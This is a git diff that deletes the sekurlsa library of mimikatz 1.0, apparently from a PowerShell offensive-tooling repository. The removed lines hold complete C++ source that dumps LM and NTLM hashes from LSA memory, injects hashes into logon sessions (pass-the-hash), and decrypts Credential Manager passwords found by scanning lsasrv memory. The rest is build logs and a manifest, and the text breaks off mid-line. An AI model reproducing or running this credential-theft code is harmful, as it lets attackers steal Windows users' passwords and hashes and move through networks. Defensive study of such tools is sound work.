diff options
Diffstat (limited to 'Exfiltration/mimikatz-1.0/librairies/sekurlsa')
35 files changed, 0 insertions, 1771 deletions
diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp deleted file mode 100644 index b429e5a..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp +++ /dev/null @@ -1,153 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "msv1_0.h" - -bool searchMSVFuncs() -{ - if(!MSV1_0_MspAuthenticationPackageId) - MSV1_0_MspAuthenticationPackageId = (mod_system::GLOB_Version.dwBuildNumber < 7000) ? 2 : 3; - return (searchLSAFuncs() && (MSV1_0_MspAuthenticationPackageId != 0)); -} - -bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) -{ - wostringstream maReponse; - if(searchMSVFuncs()) - { - unsigned short reservedSize = 0; - PMSV1_0_PRIMARY_CREDENTIAL kiwiCreds = NULL; - if(NT_SUCCESS(NlpGetPrimaryCredential(logId, &kiwiCreds, &reservedSize))) - { - wstring lmHash = mod_text::stringOfHex(kiwiCreds->LmOwfPassword, sizeof(kiwiCreds->LmOwfPassword)); - wstring ntHash = mod_text::stringOfHex(kiwiCreds->NtOwfPassword, sizeof(kiwiCreds->NtOwfPassword)); - - if(justSecurity) - maReponse << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }"; - else - { - maReponse << endl << - L"\t * Utilisateur : " << mod_text::stringOfSTRING(kiwiCreds->UserName) << endl << - L"\t * Domaine : " << mod_text::stringOfSTRING(kiwiCreds->LogonDomainName) << endl << - L"\t * Hash LM : " << lmHash << endl << - L"\t * Hash NTLM : " << ntHash; - } - SeckPkgFunctionTable->FreeLsaHeap(kiwiCreds); - } - else maReponse << L"n.t. (LUID KO)"; - } - else maReponse << L"n.a. (msv KO)"; - - return sendTo(monPipe, maReponse.str()); -} - -__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0"))); - return getLogonData(monPipe, mesArguments, &monProvider); -} - -__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wostringstream maReponse; - if(searchMSVFuncs()) - { - if(!mesArguments->empty() && mesArguments->size() >= 1 && mesArguments->size() <= 2) - { - wstring idSecAppHigh = L"0"; - wstring idSecAppLow = mesArguments->front(); - if(mesArguments->size() > 1) - { - idSecAppHigh = mesArguments->front(); idSecAppLow = mesArguments->back(); - } - - LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); - if(idApp.LowPart != 0 || idApp.HighPart != 0) - maReponse << (NT_SUCCESS(NlpDeletePrimaryCredential(&idApp)) ? L"Suppression des données de sécurité réussie :)" : L"Suppression des données de sécurité en échec :("); - else maReponse << L"LUID incorrect !"; - } - else maReponse << L"Format d\'appel invalide : delLogonSession [idSecAppHigh] idSecAppLow"; - } - else maReponse << L"n.a. (msv KO)"; - - maReponse << endl; - return sendTo(monPipe, maReponse.str()); -} - -__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wostringstream maReponse; - if(searchMSVFuncs()) - { - if(!mesArguments->empty() && mesArguments->size() >= 4 && mesArguments->size() <= 6) - { - MSV1_0_PRIMARY_CREDENTIAL kiwicreds; - RtlZeroMemory(&kiwicreds, sizeof(MSV1_0_PRIMARY_CREDENTIAL)); - - wstring idSecAppHigh = L"0", idSecAppLow, userName, domainName, lmHash, ntlmHash = mesArguments->back(); - kiwicreds.LmPasswordPresent = FALSE; - kiwicreds.NtPasswordPresent = TRUE; - - switch(mesArguments->size()) // méchants arguments utilisateurs - { - case 4: - idSecAppLow = mesArguments->front(); - userName = mesArguments->at(1); - domainName = mesArguments->at(2); - break; - case 6: - idSecAppHigh = mesArguments->front(); - idSecAppLow = mesArguments->at(1); - userName = mesArguments->at(2); - domainName = mesArguments->at(3); - kiwicreds.LmPasswordPresent = TRUE; - lmHash = mesArguments->at(4); - break; - case 5: - if(mesArguments->at(3).size() == 0x20) - { - idSecAppLow = mesArguments->front(); - userName = mesArguments->at(1); - domainName = mesArguments->at(2); - kiwicreds.LmPasswordPresent = TRUE; - lmHash = mesArguments->at(3); - } - else - { - idSecAppHigh = mesArguments->front(); - idSecAppLow = mesArguments->at(1); - userName = mesArguments->at(2); - domainName = mesArguments->at(3); - } - break; - } - - LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); - - if(idApp.LowPart != 0 || idApp.HighPart != 0) - { - if((!kiwicreds.LmPasswordPresent || (lmHash.size() == 0x20)) && ntlmHash.size() == 0x20 && userName.size() <= MAX_USERNAME_LEN && domainName.size() <= MAX_DOMAIN_LEN) - { - mod_text::InitLsaStringToBuffer(&kiwicreds.UserName, userName, kiwicreds.BuffUserName); - mod_text::InitLsaStringToBuffer(&kiwicreds.LogonDomainName, domainName, kiwicreds.BuffDomaine); - if(kiwicreds.LmPasswordPresent) - mod_text::wstringHexToByte(lmHash, kiwicreds.LmOwfPassword); - mod_text::wstringHexToByte(ntlmHash, kiwicreds.NtOwfPassword); - - maReponse << (NT_SUCCESS(NlpAddPrimaryCredential(&idApp, &kiwicreds, sizeof(kiwicreds))) ? L"Injection de données de sécurité réussie :)" : L"Injection de données de sécurité en échec :("); - } - else maReponse << L"Les hashs LM et NTLM doivent faire 32 caractères, le nom d\'utilisateur et le domaine/poste au maximum 22 caractères"; - } - else maReponse << L"LUID incorrect !"; - } - else maReponse << L"Format d\'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur {Domaine|Poste} [HashLM] HashNTLM"; - } - else maReponse << L"n.a. (msv KO)"; - - maReponse << endl; - return sendTo(monPipe, maReponse.str()); -} diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h deleted file mode 100644 index 4749573..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h +++ /dev/null @@ -1,16 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../sekurlsa.h" -#include "msv1_0_helper.h" - -bool searchMSVFuncs(); -bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity); - -__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp deleted file mode 100644 index 7ccb8e5..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp +++ /dev/null @@ -1,53 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "msv1_0_helper.h" -DWORD MSV1_0_MspAuthenticationPackageId = 0; - -void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative) -{ - if(String->Buffer) - String->Buffer = reinterpret_cast<wchar_t *>(reinterpret_cast<ULONG_PTR>(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast<ULONG_PTR>(BaseAddress))); -} - -NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize) -{ - STRING PrimaryKeyValue, CredentialString; - mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); - - NlpMakeRelativeOrAbsoluteString(Credential, &Credential->UserName); - NlpMakeRelativeOrAbsoluteString(Credential, &Credential->LogonDomainName); - CredentialString.Buffer = reinterpret_cast<char *>(Credential); - CredentialString.MaximumLength = CredentialString.Length = CredentialSize; - SeckPkgFunctionTable->LsaProtectMemory(CredentialString.Buffer, CredentialString.Length); - return SeckPkgFunctionTable->AddCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue, &CredentialString ); -} - -NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize) -{ - ULONG QueryContext = 0, PrimaryKeyLength; - STRING PrimaryKeyValue, CredentialString; - mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); - - NTSTATUS retour = SeckPkgFunctionTable->GetCredentials(LogonId, MSV1_0_MspAuthenticationPackageId, &QueryContext, FALSE, &PrimaryKeyValue, &PrimaryKeyLength, &CredentialString); - if(NT_SUCCESS(retour)) - { - SeckPkgFunctionTable->LsaUnprotectMemory(CredentialString.Buffer, CredentialString.Length); - *Credential = (PMSV1_0_PRIMARY_CREDENTIAL) CredentialString.Buffer; - NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->UserName), false); - NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->LogonDomainName), false); - if (CredentialSize) - *CredentialSize = CredentialString.Length; - } - return retour; -} - -NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId) -{ - STRING PrimaryKeyValue; - mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); - return SeckPkgFunctionTable->DeleteCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue); -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h deleted file mode 100644 index e9afd03..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h +++ /dev/null @@ -1,28 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../sekurlsa.h" - -#define MSV1_0_PRIMARY_KEY "Primary" -extern DWORD MSV1_0_MspAuthenticationPackageId; - -typedef struct _MSV1_0_PRIMARY_CREDENTIAL { - LSA_UNICODE_STRING LogonDomainName; - LSA_UNICODE_STRING UserName; - BYTE NtOwfPassword[0x10]; - BYTE LmOwfPassword[0x10]; - BOOLEAN NtPasswordPresent; - BOOLEAN LmPasswordPresent; - wchar_t BuffDomaine[MAX_DOMAIN_LEN]; - wchar_t BuffUserName[MAX_USERNAME_LEN]; -} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL; - -void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true); - -NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize); -NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize); -NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog Binary files differdeleted file mode 100644 index af1843d..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog Binary files differdeleted file mode 100644 index 065c191..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog Binary files differdeleted file mode 100644 index 662e27d..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog +++ /dev/null @@ -1 +0,0 @@ -ÿþ
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog +++ /dev/null @@ -1 +0,0 @@ -ÿþ
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog Binary files differdeleted file mode 100644 index 8bfc485..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog Binary files differdeleted file mode 100644 index a090f02..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog Binary files differdeleted file mode 100644 index 3c62e5a..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog Binary files differdeleted file mode 100644 index a61d64e..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog Binary files differdeleted file mode 100644 index c2411f0..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog Binary files differdeleted file mode 100644 index 0c67d61..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog Binary files differdeleted file mode 100644 index 52d7b3d..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog Binary files differdeleted file mode 100644 index 465eb7a..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog Binary files differdeleted file mode 100644 index 9befde9..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest deleted file mode 100644 index ecea6f7..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest +++ /dev/null @@ -1,10 +0,0 @@ -<?xml version='1.0' encoding='UTF-8' standalone='yes'?> -<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> - <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> - <security> - <requestedPrivileges> - <requestedExecutionLevel level='asInvoker' uiAccess='false' /> - </requestedPrivileges> - </security> - </trustInfo> -</assembly> diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate deleted file mode 100644 index 4d28193..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate +++ /dev/null @@ -1,2 +0,0 @@ -#v4.0:v100 -Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\| diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res Binary files differdeleted file mode 100644 index d0ba1dd..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog deleted file mode 100644 index 929c472..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog +++ /dev/null @@ -1,5 +0,0 @@ -^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\librairies\sekurlsa\sekurlsa.vcxproj -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.exp -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.exp diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp deleted file mode 100644 index fe846b4..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp +++ /dev/null @@ -1,180 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "credman.h" - -PCRED_I_ENUMERATE CredIEnumerate = NULL; - -bool searchCredmanFuncs() -{ -#ifdef _M_X64 - BYTE PTRN_WIN5_CrediEnumerate[] = {0x48, 0x8b, 0xc4, 0x48, 0x81, 0xec, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x70, 0xe8, 0x48, 0x89, 0x78, 0xe0, 0x4c, 0x89, 0x60, 0xd8, 0x45, 0x33, 0xe4}; - LONG OFFS_WIN5_CrediEnumerate = 0; - BYTE PTRN_WNO8_CrediEnumerate[] = {0x48, 0x81, 0xec, 0xd0, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xed}; - LONG OFFS_WNO8_CrediEnumerate = -22; - BYTE PTRN_WIN8_CrediEnumerate[] = {0x48, 0x81, 0xec, 0xe0, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xed}; - LONG OFFS_WIN8_CrediEnumerate = -30; -#elif defined _M_IX86 - BYTE PTRN_WIN5_CrediEnumerate[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x24, 0x53, 0x33, 0xdb, 0x57, 0x33, 0xc0}; - BYTE PTRN_WN60_CrediEnumerate[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x40, 0x33, 0xc9}; - BYTE PTRN_WN61_CrediEnumerate[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x44, 0x33, 0xc0}; - BYTE PTRN_WN62_CrediEnumerate[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x80, 0x00, 0x00, 0x00, 0x33, 0xc0}; - LONG OFFS_WALL_CrediEnumerate = 0; -#endif - - if(!CredIEnumerate) - { - PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; -#ifdef _M_X64 - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - pattern = PTRN_WIN5_CrediEnumerate; - taille = sizeof(PTRN_WIN5_CrediEnumerate); - offset = OFFS_WIN5_CrediEnumerate; - } - else - { - if (mod_system::GLOB_Version.dwMinorVersion < 2) - { - pattern = PTRN_WNO8_CrediEnumerate; - taille = sizeof(PTRN_WNO8_CrediEnumerate); - offset = OFFS_WNO8_CrediEnumerate; - } - else - { - pattern = PTRN_WIN8_CrediEnumerate; - taille = sizeof(PTRN_WIN8_CrediEnumerate); - offset = OFFS_WIN8_CrediEnumerate; - } - } -#elif defined _M_IX86 - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - pattern = PTRN_WIN5_CrediEnumerate; - taille = sizeof(PTRN_WIN5_CrediEnumerate); - } - else - { - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - pattern = PTRN_WN60_CrediEnumerate; - taille = sizeof(PTRN_WN60_CrediEnumerate); - } - else if (mod_system::GLOB_Version.dwMinorVersion < 2) - { - pattern = PTRN_WN61_CrediEnumerate; - taille = sizeof(PTRN_WN61_CrediEnumerate); - } - else - { - pattern = PTRN_WN62_CrediEnumerate; - taille = sizeof(PTRN_WN62_CrediEnumerate); - } - } - offset = OFFS_WALL_CrediEnumerate; -#endif - mod_memory::genericPatternSearch(reinterpret_cast<PBYTE *>(&CredIEnumerate), L"lsasrv", pattern, taille, offset, NULL, true, true); - } - return (searchLSAFuncs() && CredIEnumerate); -} - -__kextdll bool __cdecl getCredmanFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wostringstream monStream; - monStream << L"** lsasrv.dll ** ; Statut recherche : " << (searchCredmanFuncs() ? L"OK :)" : L"KO :(") << endl << endl << - L"@CredIEnumerate = " << CredIEnumerate << endl << - L"@LsaUnprotectMemory = " << SeckPkgFunctionTable->LsaUnprotectMemory << endl; - return sendTo(monPipe, monStream.str()); -} - -__kextdll bool __cdecl getCredman(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getCredmanData, wstring(L"credman"))); - return getLogonData(monPipe, mesArguments, &monProvider); -} - -bool WINAPI getCredmanData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) -{ - wostringstream message; - if(searchCredmanFuncs()) - { - DWORD credNb = 0; - PCREDENTIAL * pCredential = NULL; - DWORD CredIEnumerateFlags = (mod_system::GLOB_Version.dwMajorVersion < 6) ? 0 : CRED_ENUMERATE_ALL_CREDENTIALS; - NTSTATUS status = (mod_system::GLOB_Version.dwBuildNumber < 8000 ) ? CredIEnumerate(logId, 0, NULL, CredIEnumerateFlags, &credNb, &pCredential) : reinterpret_cast<PCRED_I_ENUMERATE62>(CredIEnumerate)(logId, NULL, CredIEnumerateFlags, &credNb, &pCredential); - - if(NT_SUCCESS(status)) - { - for(DWORD i = 0; i < credNb; i++) - { - wstring Target(pCredential[i]->TargetName); - wstring ShortTarget = (mod_system::GLOB_Version.dwMajorVersion < 6) ? Target : Target.substr(Target.find_first_of(L'=') + 1); - - message << endl; - if(justSecurity) - message << L"\t [" << i << L"] " << Target << L'\t'; - else message << - L"\t * [" << i << L"] Target : " << Target << L" / " << (pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"<NULL>") << endl << - L"\t * [" << i << L"] Comment : " << (pCredential[i]->Comment ? pCredential[i]->Comment : L"<NULL>") << endl << - L"\t * [" << i << L"] User : " << (pCredential[i]->UserName ? pCredential[i]->UserName : L"<NULL>") << endl; - - if((pCredential[i]->Type != CRED_TYPE_GENERIC) && (pCredential[i]->Type != CRED_TYPE_GENERIC_CERTIFICATE)) - { - CREDENTIAL_TARGET_INFORMATION mesInfos = {const_cast<wchar_t *>(ShortTarget.c_str()), NULL, NULL, NULL, NULL, NULL, NULL, pCredential[i]->Flags, 0 , NULL}; - DWORD dwNbCredentials; - PENCRYPTED_CREDENTIALW * pEncryptedCredential; - NTSTATUS status = SeckPkgFunctionTable->CrediReadDomainCredentials(logId, CREDP_FLAGS_IN_PROCESS, &mesInfos, 0, &dwNbCredentials, &pEncryptedCredential); - if(status == STATUS_INVALID_PARAMETER) - { - mesInfos.Flags |= CRED_TI_USERNAME_TARGET; - status = SeckPkgFunctionTable->CrediReadDomainCredentials(logId, CREDP_FLAGS_IN_PROCESS, &mesInfos, 0, &dwNbCredentials, &pEncryptedCredential); - } - if(NT_SUCCESS(status)) - { - for(DWORD j = 0; j < dwNbCredentials ; j++) - { - wostringstream prefix; prefix << L"[" << j << L"] "; - message << descEncryptedCredential(pEncryptedCredential[j], justSecurity, prefix.str()); - } - SeckPkgFunctionTable->CrediFreeCredentials(dwNbCredentials, pEncryptedCredential); - } - else message << L"Erreur CrediReadDomainCredentials : " << mod_system::getWinError(false, status); - } - else - { - PENCRYPTED_CREDENTIALW pEncryptedCredential; - NTSTATUS status = SeckPkgFunctionTable->CrediRead(logId, CREDP_FLAGS_IN_PROCESS, const_cast<wchar_t *>(ShortTarget.c_str()), pCredential[i]->Type, 0, &pEncryptedCredential); - if(NT_SUCCESS(status)) - { - message << descEncryptedCredential(pEncryptedCredential, justSecurity); - CredFree(pEncryptedCredential); - } - else message << L"Erreur CrediRead : " << mod_system::getWinError(false, status); - } - } - CredFree(pCredential); - } - else message << L"CredIEnumerate KO : " << mod_system::getWinError(false, status); - } else message << L"n.a. (credman KO)"; - return sendTo(monPipe, message.str()); -} - -wstring descEncryptedCredential(PENCRYPTED_CREDENTIALW pEncryptedCredential, __in bool justSecurity, wstring prefix) -{ - wostringstream monStream; - - LSA_UNICODE_STRING encryptedPassword = {pEncryptedCredential->Cred.CredentialBlobSize, pEncryptedCredential->Cred.CredentialBlobSize, reinterpret_cast<PWSTR>(pEncryptedCredential->Cred.CredentialBlob)}; - wstring cred = getPasswordFromProtectedUnicodeString(&encryptedPassword); - - if(justSecurity) - monStream << L"- {" << pEncryptedCredential->Cred.UserName << L" ; " << cred << L" } "; - else monStream << - L"\t " << prefix << L"User : " << pEncryptedCredential->Cred.UserName << endl << - L"\t " << prefix << L"Cred : " << cred << endl; - - return monStream.str(); -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h deleted file mode 100644 index 60d1249..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.h +++ /dev/null @@ -1,19 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../sekurlsa.h" - -bool searchCredmanFuncs(); -__kextdll bool __cdecl getCredmanFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl getCredman(mod_pipe * monPipe, vector<wstring> * mesArguments); -bool WINAPI getCredmanData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity); - -wstring descEncryptedCredential(PENCRYPTED_CREDENTIALW pEncryptedCredential, __in bool justSecurity, wstring prefix = L""); - -typedef NTSTATUS (WINAPI * PCRED_I_ENUMERATE) (IN PLUID pLUID, IN DWORD unk0, IN LPCTSTR Filter, IN DWORD Flags, OUT DWORD *Count, OUT PCREDENTIAL **Credentials); -typedef NTSTATUS (WINAPI * PCRED_I_ENUMERATE62) (IN PLUID pLUID, IN LPCTSTR Filter, IN DWORD Flags, OUT DWORD *Count, OUT PCREDENTIAL **Credentials); - diff --git 